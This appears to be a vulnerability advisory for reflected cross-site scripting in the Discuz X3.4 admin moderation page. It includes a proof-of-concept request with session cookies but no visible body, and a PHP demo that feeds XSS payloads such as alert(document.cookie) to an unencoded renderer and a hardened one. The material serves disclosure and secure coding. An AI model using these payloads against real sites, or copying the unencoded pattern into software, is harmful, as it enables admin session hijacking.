Discuz X3.4 (SC_UTF8_20221111): backend reflected cross-site scripting in admin.php content auditing
Description
The admin backend's content-audit search (admin.php, action=moderate, operation=threads) reflects the POST parameters dateline, title, tpp and username into the response without sufficient output encoding. The injected value bypasses Discuz's security check; it can hijack the callback URL link, and it can also inject JavaScript into the setTimeout() call at the end of the HTML response.
Affected Version
Discuz X <= 3.4 (SC_UTF8_20221111 build)
POC
POST /cms/discuz/upload/admin.php?action=moderate&operation=threads HTTP/1.1
Host: 192.168.0.4
Content-Length: 166
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.4
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.4/cms/discuz/upload/admin.php?action=moderate&operation=threads
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 5Kkn_2132_saltkey=y03s5T45; 5Kkn_2132_lastvisit=1668496347; 5Kkn_2132_ulastactivity=07108qps3b3FkXEEZNxrT%2BtyQpXYN9%2FSOodQCNbMLoO%2BO6DOk8pF; 5Kkn_2132_auth=7791L55DZFdkAgcM5rDcnjIiVH0t%2BptlGCIqLkAhUIRMsUDTnq%2BGi7atBCt%2BPdyl2mCVv0hA3jA%2BxaOfDB1h; 5Kkn_2132_lastcheckfeed=1%7C1668501456; 5Kkn_2132_nofavfid=1; 5Kkn_2132_sid=yhpz44; 5Kkn_2132_lip=172.17.0.1%2C1668502019; 5Kkn_2132_lastact=1668502045%09admin.php%09
Connection: close
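The following PHP is an added illustration of the reflection pattern the description above refers to; it is not Discuz's own code and does not reproduce the Discuz moderation page. It shows one POST value landing in three contexts (an input attribute, an href, and the string argument of setTimeout()) first unencoded, then hardened with context-specific encoding. The parameter name callback, the page layout, the numeric meaning of tpp and the sample POST values are assumptions made for the example.

```php
<?php
// Added illustration (not Discuz's code): the reflection pattern the advisory
// describes, in a vulnerable form and a hardened form. Parameter names
// title/tpp/callback and the page layout are assumptions for the example.

function render_vulnerable(array $post): string
{
    $title    = $post['title'] ?? '';
    $tpp      = $post['tpp'] ?? '20';
    $callback = $post['callback'] ?? 'admin.php?action=moderate&operation=threads';

    // Each value lands in a different context: an attribute, an href, and the
    // string argument of setTimeout() (which is evaluated as code). None is encoded.
    return '<input name="title" value="' . $title . '">' . "\n"
         . '<input name="tpp" value="' . $tpp . '">' . "\n"
         . '<a href="' . $callback . '">back</a>' . "\n"
         . '<script>setTimeout("window.location=\'' . $callback . '\'", 3000);</script>';
}

function render_hardened(array $post): string
{
    $enc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    $title    = $enc((string)($post['title'] ?? ''));
    $tpp      = max(1, (int)($post['tpp'] ?? 20));   // assumed numeric: cast, never echo raw
    $callback = (string)($post['callback'] ?? '');

    // Accept only a relative admin.php URL with a plain query string; anything
    // with a scheme, a protocol-relative prefix or unexpected characters falls
    // back to the default, so the link can no longer be pointed elsewhere.
    if (!preg_match('#^admin\.php(\?[A-Za-z0-9_=&%.-]*)?$#', $callback)) {
        $callback = 'admin.php?action=moderate&operation=threads';
    }

    // HTML contexts get entity encoding. The JS context gets a JSON string
    // literal with < > & ' " hex-escaped, so the value cannot terminate the
    // string, the statement or the <script> block; no string-eval setTimeout.
    $cbJs = json_encode($callback, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);

    return '<input name="title" value="' . $title . '">' . "\n"
         . '<input name="tpp" value="' . $tpp . '">' . "\n"
         . '<a href="' . $enc($callback) . '">back</a>' . "\n"
         . '<script>setTimeout(function () { window.location = ' . $cbJs . '; }, 3000);</script>';
}

// Constructed sample input standing in for the POST body (not taken from the report).
$sample = [
    'title'    => '"><img src=x onerror=alert(1)>',
    'tpp'      => '20" onfocus="alert(2)',
    'callback' => "';alert(document.cookie);//",
];

echo "--- vulnerable ---\n", render_vulnerable($sample), "\n\n";
echo "--- hardened ---\n",   render_hardened($sample),   "\n";
```

Run it with `php example.php` and compare the two outputs: in the vulnerable block the title closes the attribute and opens an img tag, tpp adds an event handler, and callback both breaks out of the single-quoted string inside setTimeout() and rewrites the "back" link. In the hardened block the same values are inert, which is the point of encoding per output context rather than relying on a single input filter.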